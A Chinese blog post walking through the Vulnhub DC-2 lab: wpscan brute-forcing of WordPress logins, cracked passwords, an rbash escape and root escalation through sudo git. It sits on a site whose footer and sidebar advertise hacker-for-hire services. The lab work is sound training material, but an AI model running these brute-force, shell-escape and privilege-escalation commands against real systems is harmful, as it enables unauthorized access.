当前位置:首页 > 黑客技术 > 正文内容

Vulnhub靶机渗透测试之DC-2-WordPress

访客4年前 (2021-04-15)黑客技术1027

环境部署

攻击机kali:192.168.0.114

靶机dc-2:192.168.0.131

靶机下载地址:https://download.vulnhub.com/dc/DC-2.zip

1、直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本的)

2、解压会得到一个.ova的文件,然后在VMware中打开即可

3、虚拟机打开页面如下,一个登陆页面

信息收集

1、使用nmap进行扫描,发现dc-2靶机的ip为:192.168.0.131

2、继续扫描靶机的端口,可以看到开放了80端口和7744端口(在此端口上部署了ssh服务)

3、因为开放了80端口,所以在浏览器中访问:http://192.168.0.131:80,发现url变成了http://dc-2,很明显,DNS没有被解析。

4、再次查看一下nmap的扫描结果,发现如下结果,nmap给出了无法跟踪跳转到http://dc-2/,所以我们需要去添加hosts的地址

5、hosts文件所在路径

windows:C:\Windows\System32\drivers\etc\hosts

linux:/etc/hosts

我是在物理机访问的dc-2靶场,所以就在我的物理机上的hosts文件中添加了:192.168.0.131 dc-2 解析

在linux中也是在hosts文件添加:192.168.0.131 dc-2,如下:

6、然后再次访问:http://192.168.0.131:80,是一个wordpress的界面。

7、找到第一个flag1

8、提示翻译过来如下

爆破账户名和密码

密码生成

1、提示我们需要一个用户名来登录,而且其中有一个关键字:cewl(kali自带这个工具),这是一个linux的字典生成工具,最大的特点就是能够爬取网站的信息并生成字典。

使用cewl来爬取网站并生成密码字典

cewl http://dc-2/ -w dc-2.txt #生成字典

wc -l dc-2.txt #查看字典中有多少行

扫描用户名账号

1、因为网站是wordpress,所以采用wpscan来扫描

wpscan --url dc-2? -e u #扫描出网站的用户名

发现了3个账号:admin、jerry、tom

开始爆破

1、使用之前获取的三个用户名和cewl工具生成的字典的来爆破

dc-2-user.txt文件:存放用户名? ?dc-2.txt:存放密码

wpscan --url http://dc-2/-U dc-2-user.txt -P dc-2.txt

成功爆出jerry和tom的密码:

jerry/adipiscing
tom/parturient

2、登录后台,wordpress默认后台路径是:/wp-login.php,访问后台登录界面

使用jerry用户登录(使用tom登录没有什么有用的信息)

3、点击Pages按钮,查看到flag2,查看flag2

翻译过来为:

此时我们只能从另外一个入口来寻找flag了。

ssh登录靶机

1、使用之前爆破的用户名和密码来登录

jerry/adipiscing
tom/parturient

使用jerry登录,被拒绝登录了,只能使用tom用户登录

2、虽然登陆了ssh登录成功,但是无法使用cat或者vim查看flag3

绕过rbash

1、查看环境变量,发现只有4个命令可以使用

2、即我们获取到的shell为:Restricted shell(受限制的shell),可以添加环境变量来绕过

#绕过rbash

BASH_CMDS[a]=/bin/sh;a


#添加环境变量

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin/

3、成功读取flag3

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

翻译:可怜的老汤姆总是追随杰里。也许他应该承受自己造成的所有压力。

线索指向了jerry,提示使用su切换用户

4、使用su jerry切换为jerry用户,密码为之前获取的密码,成功读取flag4


提示为git,应该是使用git提权

git提权

1、查看jerry可以以root用户的身份执行git命令而且还不需要密码

2、提权

方法1:

sudo git -p help #强制进入交互状态

!/bin/bash #打开一个用户为root的shell


方法2:

sudo git help config #在末行命令模式输入

!/bin/bash 或者 !'sh' #打开一个用户为root的shell

成功获取到最后一个flag

知识点总结

1、wordpress的后台登陆点以及域名解析

2、cewl工具和wpscan工具的使用

3、su命令切换用户

4、git提权

参考文章

http://akevin.cn/index.php/archives/572/

https://blog.csdn.net/weixin_44288604/article/details/108032112

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106015.html

分享给朋友:

“Vulnhub靶机渗透测试之DC-2-WordPress” 的相关文章

美团暗语「美团暗语2021」

 昨天,很多网友问小编美团暗语最好的方法是什么?有关美团暗语2021最好的方法是哪种?最新美团暗语2020?根据网民透露的审判细节这篇文章主要介绍了美团暗语,包括美团暗语 据大江网2021年10月20日17:01:48的最新消息,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全...

黑客了解,中国黑客越南网络apt,黑客网站密码破解工具

6.42 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 进程三:使命履行及实时数据剖析10.61 2019年6月19日,FireEye Endpoint Security设备上收到了缝隙检测警报。 违规应用程序被辨认为Microso...

安宫牛黄丸现在价格 - 天地和堂安宫牛黄丸多少钱

一丸280元左右.装同仁堂安宫牛黄丸,那个年代的这个玩意,中医说法多少,体外培育牛黄。 两丸,字[2000]201号\制定安宫牛黄丸等药品价格的批复,到正规的同仁堂自己品牌的药店购买,价格不一样,希望懂得.天然牛黄天然麝香。北京同仁堂牛黄解毒丸的市场价格在2005年。 绿色木盒这三种包装的价格一样,...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

二手退役62军用望远镜(二手60倍望远镜转让)

并不是真正的军用级别产品,现在绝大部分,北京星河望远镜为您解答:我们,俺以前买过退役俄罗斯的,为满足全天侯使用要求开发成功的高密封。 需要望远镜。早期的军用望远镜,长时间看不头晕.平常旅游观景、如今已经推出军队服役,不会存在,尽管现在的光学技术水平有了很大提高。 宽带增透绿膜镜头,62式8X30望远...

如何寻找黑客微信号(只有一个微信号,黑客可以查到对方吗)

一、如何寻找黑客微信号(只有一个微信号,黑客可以查到对方吗) 1、有黑客能查到微信聊天记录是骗人的吗绝对是骗子,请勿相信! 微信聊天信息保存在本地 一般聊天信息都是保存在本地的,除非开通会员可以将聊天信息存储。 黑客查找出来的微信聊天截图是真的吗在手机端启动微信,在微信主界面底部导航中点击“微信”...

评论列表

拥嬉莺时
2年前 (2022-07-07)

下:6、然后再次访问:http://192.168.0.131:80,是一个wordpress的界面。7、找到第一个flag18、提示翻译过来如下爆破账户名和密码密码生成1、提示我们需要一个用户名来登录,而且其中有一个关键字:cewl

莣萳折奉
2年前 (2022-07-07)

s按钮,查看到flag2,查看flag2翻译过来为:此时我们只能从另外一个入口来寻找flag了。ssh登录靶机1、使用之前爆破的用户名和密码来登录jerry/adipiscingtom/parturient使用jerry登录,被拒绝登录

竹祭木白
2年前 (2022-07-07)

查看flag3绕过rbash1、查看环境变量,发现只有4个命令可以使用2、即我们获取到的shell为:Restricted shell(受限制的shell),可以添加环境变量来绕过#绕过rbashBASH_CMDS[a]=/bin/sh;a#添加环境变量export

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。